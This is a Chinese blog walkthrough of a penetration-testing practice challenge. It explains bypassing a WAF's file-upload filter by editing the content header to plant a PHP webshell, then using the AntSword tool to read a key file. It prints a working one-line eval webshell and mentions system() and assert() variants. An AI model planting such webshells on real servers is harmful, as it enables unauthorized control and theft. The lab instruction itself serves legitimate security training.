文件上传题型

最新推荐文章于 2024-04-13 12:56:02 发布
最新推荐文章于 2024-04-13 12:56:02 发布
阅读量730 收藏 5
点赞数 1
分类专栏: 安全渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43795682/article/details/118274320
版权

题目:通过你所学到的知识,测试其过WAF滤规则,突破上传获取webshell,答案就在根目录下key.php文件中。

先去上传1.php文件,里面编写一句话木马:<?php eval($_POST[c]);?>

1、通过抓包来获取内容,发现并没有上传成功

2、 通过后缀名绕过上传:失败

3、通过内容头部绕过:成功(也有可能屏蔽eval函数,使用system函数或者assert()函数

去访问上传的路径:http://192.168.129.128:82/vulnerabilities/1.phtml

使用蚁剑webshell进行连接:http://192.168.129.128:82/vulnerabilities/1.phtml

进入webshell后台管理界面:

获取到key.php值;

另一种办法:

1、上传system()函数去查看当前路径里的文件

2、查看上一级目录下的文件,发现key.php文件

3、打开上一级目录下key.php文件,找到key值

张星星9527
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISP-PTE实操练习讲解二(新版)
lza20001103的博客
08-06 6872
CISP-PTE实操练习讲解二(新版)
文件(第1-19关)
qq_45751902的博客
04-02 1717
lastIndexOf() 方法可返回一个指定的字符串值最后出现的位置,在一个字符串中的指定位置从后向前搜索。 stringObject.lastIndexOf(searchvalue,fromindex) searchvalue 必需。规定需检索的字符串值。 fromindex 可选的整数参数。规定在字符串中开始检索的位置。它的合法取值是 0 到 stringObject.length - 1。如省略该参数,则将从字符串的最后一个字符处开始检索。 注释:lastIndexOf() 方法对大小写敏
PHP练习7 文件
anmic123的博客
10-09 415
本实验实现上文件到服务器,并通过页面呈现目录下文件。 1. upload.html &lt;html&gt; &lt;head&gt; &lt;title&gt;Administration - upload new files&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;h1&gt;Upload new news files&lt
文件及相关例
2401_82388450的博客
04-13 977
文件漏洞是指用户上了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件” 本身没有问,有问的是文件后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
CISP-PTE学习总结之基础练习(二)
千寻的博客
10-20 7415
基础目一:SQL注入 0x01 目要求 0x02 解过程 基础目二:文件突破 0x01 目要求 0x02 解过程 基础目三:文件包含 0x01 目要求 0x02 解过程 0x03 解总结 基础目四:代码执行漏洞 0x01 目要求 0x02 解过程 0x03 解总结 基础目五:失效的访问控制 0x01 目要求 0x02 解过程
文件+CTF
unexpectedthing的博客
10-27 2350
文章目录概念:文件绕过:1.绕过js代码:2.绕过服务端(MIME类)3.绕过黑名单绕过白名单图片马文件后利用蚁剑进行连接后门 概念: web客户端在上文件时,没有对上文件的内容,扩展名等进行过滤。 文件绕过: 1.绕过js代码: (1)一般的web网页前端在上文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上,利用bp抓包,改数据包扩
系统集成项目管理工程师考试试分类精解与练习
03-17
本书由希赛IT教育研发中心组织编写,可作为计算机技术与软件专业技术资格(水平)考试中的系统集成项目管理工程师级别的考试辅导指定教材。本书的每章按照同样的体例进行内容的...由于文件太大,只能分卷压缩上了。
计算机组成与结构实验一-运算器实验,设计并实现的一个 ALU+实验报告
01-15
<项目介绍> 设计并实现一个 ALU+实验报告 - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试...下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
基于C++和QT实现的桌面电子化考试系统(教师端),支持多种,选择、填空、阅读理解、选词填空等
最新发布
06-14
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上的,请...
基于uniapp实现的微信小程序志愿者活动报名在线试卷考试系统源代码+文档说明+sql文件
11-12
管理员在web后台登录后可以管理注册用户信息,发布和管理各种义工活动信息和红色活动信息,处理用户的活动申请记录,管理在线试卷和试卷的所有试内容,其中试卷目包括单选,多选,判断和填空多种,...
计算机常用工具软件--教案5.31(1--2节).pdf
09-26
计算机常用工具软件--FlashFXP输工具是计算机领域中的一种常用工具软件,主要用于下载和上文件。下面是该软件的详细知识点: 一、FlashFXP的概念 FlashFXP是一款常用的FTP输软件,具有界面简单、功能强大等...
目4 命令执行(保姆级教程)【文末有惊喜】
honest_gg的博客
07-21 303
CISP-PTE-Centos:基础目之命令执行
获取Webshell的常用方法(一)
Captain_RB的博客
12-03 9552
Webshell是以php、asp、jsp等网站脚本文件形式存在的一种网页后门,攻击者可以利用web请求的方式,获得webshell,控制网站服务器,进而进行执行命令、上下载文件等操作。本文主要介绍在渗透测试过程中获取Webshell的基本思路,实战中还需就地取材,灵活应对。
Get Offer —— 渗透测试岗试汇总(Web相关知识点)
Boom!脑洞大爆炸的博客
07-21 5575
一篇文章了解Web知识点
关于eWebEditor突破上图片大小限制的问
luoye&guoguo
05-19 3038
有两个地方需要改:第一,按照楼上的方法去数据库改eWebEditor_style在这表S_ImageSize这个字段,默认的是100,或者更方便的是,登陆ewebeditor的后台来改,它的后台地址是:webeditor/admin_login.asp.第二,如果你的系统安装的是2003带的iis6,你需要将iis6默认的200K文件大小限制修改掉,具体改iis6限制的方法去.我还没有摸索出来
WAF详解及WAF绕过
赤赤三的博客
03-20 8586
waf(web application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
网站上文件漏洞
梦翼-的博客
12-06 1714
文件可以作为一个漏洞来进行攻击,但是目前一般都有检查对应的文件名,不过window下还是有方法可以绕过这个检查的,下面举个例子:   1、 新建一个文件,取名为test.txt 2、 后台MyServlet代码: public void doPost(HttpServletRequest request,HttpServletResponse response) throws Ser
渗透面试
热门推荐
China_C_boss的博客
01-18 6万+
思路流程 信息收集 服务器的相关信息(真实ip,系统类,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文...
本地文件包含之包含日志获取webshell
WYJ____的博客
08-06 3359
预备知识 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。 实验目的 学会包含日志获取webshell 实验工具 浏览器 实验环境 客户机一台 实验步骤 1、访问127.0.0.1/FI/PHP_FI.php?filename=LFI.txt网页显示是文件包含漏洞。 2.浏览器设置代理服务的步骤...
python文本文件相关
06-03
以下是几个与 Python 文本文件相关的: 1. 如何打开一个文本文件并读取其中的内容? ```python # 打开文件 with open('file.txt', 'r') as f: # 读取文件内容 content = f.read() # 输出文件内容 print...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值